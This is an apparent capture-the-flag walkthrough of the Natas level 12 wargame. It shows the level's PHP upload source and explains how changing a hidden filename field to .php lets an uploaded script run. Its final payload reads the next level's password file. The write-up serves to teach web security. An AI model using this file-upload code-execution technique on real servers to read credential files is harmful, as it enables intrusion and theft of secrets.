Natas12 seems to be a file upload page:


Lets try it out with the image we got from natas2



If we follow the link we get the image we just uploaded. The URL tells me this is a php page so let make a script and see if it loads the php:


If we uploaded it and follow to the link we get the following error:


Makes sense, this isn't an image and firefox can't read it as an image. Let look at the source to see if we can get any hints:

<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="">
<link rel="stylesheet" href="" />
<link rel="stylesheet" href="" />
<script src=""></script>
<script src=""></script>
<script src=></script><script src=""></script>
<script>var wechallinfo = { "level": "natas12", "pass": "<censored>" };</script></head>
<div id="content">

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";    

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];

    return $string;

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
} else {

<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Following the source, we can see that the extension of the uploaded file is set from the filename. The filename is sent with the POST request in a hidden field. Lets change this value to something with a .php and see what happens:


Looks like the correct extension is showing up now:


And we can execute the php!:


Now lets make a script that does something:

echo "Getting File:</br>";
echo file_get_contents('/etc/natas_webpass/natas13');
echo "</br>done!";

And here is the password for natas13: